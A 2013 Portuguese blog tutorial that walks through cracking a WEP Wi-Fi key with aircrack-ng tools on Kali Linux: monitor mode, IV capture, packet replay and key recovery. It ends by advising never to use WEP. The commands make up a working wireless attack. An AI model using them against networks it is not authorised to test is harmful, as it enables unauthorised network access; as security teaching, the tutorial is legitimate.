quarta-feira, 11 de setembro de 2013

Tutorial: Como descobrir a senha do Wi-Fi que usa criptografia WEP (Ethical Hacking)

quarta-feira, 11 de setembro de 2013 - by Igor Tech

Olá a todos
Hoje gostaria de mostrar pra vcs como pode ser feito para descobrir a senha do Wi-Fi de um Access Point configurado com a criptografia WEP
Para esse tutorial estou usando o Kali Linux
Para instalar e configurar o Kali Linux no Virtual Box você pode seguir nossa dica
Vale lembrar que caso esteja usando no Virtual Box, vc vai precisar de uma placa de rede Wi-Fi USB e adicionar ela no menu “Devices/USB Devices” e selecionar a placa USB para que ela possa ser reconhecida pela VM, agora caso vc esteja rodando direto no metal daí ele já vai reconhecer a própria placa que tiver no PC ou Note.
No Terminal Digite um ifconfig para verificar qual é sua placa de rede wireless no nosso caso é a Wlan0 daí digite o seguinte:
# airmon-ng start wlan0
Isso vai colocar a placa em modo monitor note que será criada uma nova interface no caso amon0, após isso digite:
# airodump-ng -i mon0
Será exibido uma tela semelhante a essa
ScreenHunter_21 Apr. 24 10.18

Na tela acima é possível visualizar todas as redes ao alcance no caso a que queremos é que tem a cripotografia WEP e devemos tomar nota das seguintes informações o BSSID o Canal que é onde está como CH e o ESSID que é o nome da rede.
Com essas informações em mãos vamos executar o próximo comando:
# airodump-ng --ivs -w wep --channel 6 -bssid 00:00:00:00:00:01 mon0
Onde vc deve substituir wep pelo nome que desejar, isso é apenas o prefixo do arquivo que será gerado, ex: wep-01.ivs, wep-02.ivs etc..
Substitua em o valor em –channel o pelo número do seu canal obtido em no campo CH no primeiro comando que foi executado
Substitua em o valor em –bssid pelo número do seu BSSID obtido no campo BSSID do primero comando que foi executado
Se tudo estiver correto vc ver uma tela semelhante a essa abaixo:
ScreenHunter_22 Apr. 24 10.42

O próximo passo é deixar executando o comando acima e gerar algum tráfego para que possamos fazer a quebra da senha, podemos simular algumas tentativas de associação com o AP e gerar algum tráfego com os comandos:
# aireplay-ng -1 0 -e dlink-test -a 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
# aireplay-ng -3 -b 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
No primeiro comando substitua o valor de -e pelo valor do seu ESSID obtido no primeiro comando
Onde está o valor de -a vc vai colocar o BSSID do Access Point e no valor de -h vc vai colocar o seu MAC Address.
No segundo comando substitua o valor de -b pelo seu BSSID e no valor de -h vc vai colocar o seu MAC Address.
Deixe o segundo aireplay-ng executando um tempo até gerar dados suficiente para a quebra da criptografia
Vai ficar mais ou menos assim
ScreenHunter_21 Apr. 24 10.42

Agora vem a melhor parte, para descobrir a senha do wi-fi após capturar algum tempo, no meu caso uns 5min. é só executar o seguinte
# aircrack-ng -a 1 wep-01.ivs
Onde evidentemente vc deve trocar wep-01.ivs pelo arquivo ivs que vc gerou, daí a senha será vista da seguinte maneira:
ScreenHunter_22 Apr. 24 10.47
No caso acima a senha é 12345
Só tem um jeito de se prevenir contra isso, nunca jamais use WEP!!!
Como descobrir a senha do wifi de qualquer roteador que tenha a função WPS ativada independente do tipo de criptografia usada
Como descobrir a senha do wifi de roteadores com a criptografia WPA2 ativada veja essa dica aqui
Espero que tenham gostado.
Não se esqueça de compartilhar e assinar nosso blog.
Abraços e até a próxima

About the Author

Write admin description here..

© 2013 Igor Tech . WP Theme-junkie converted by BloggerTheme9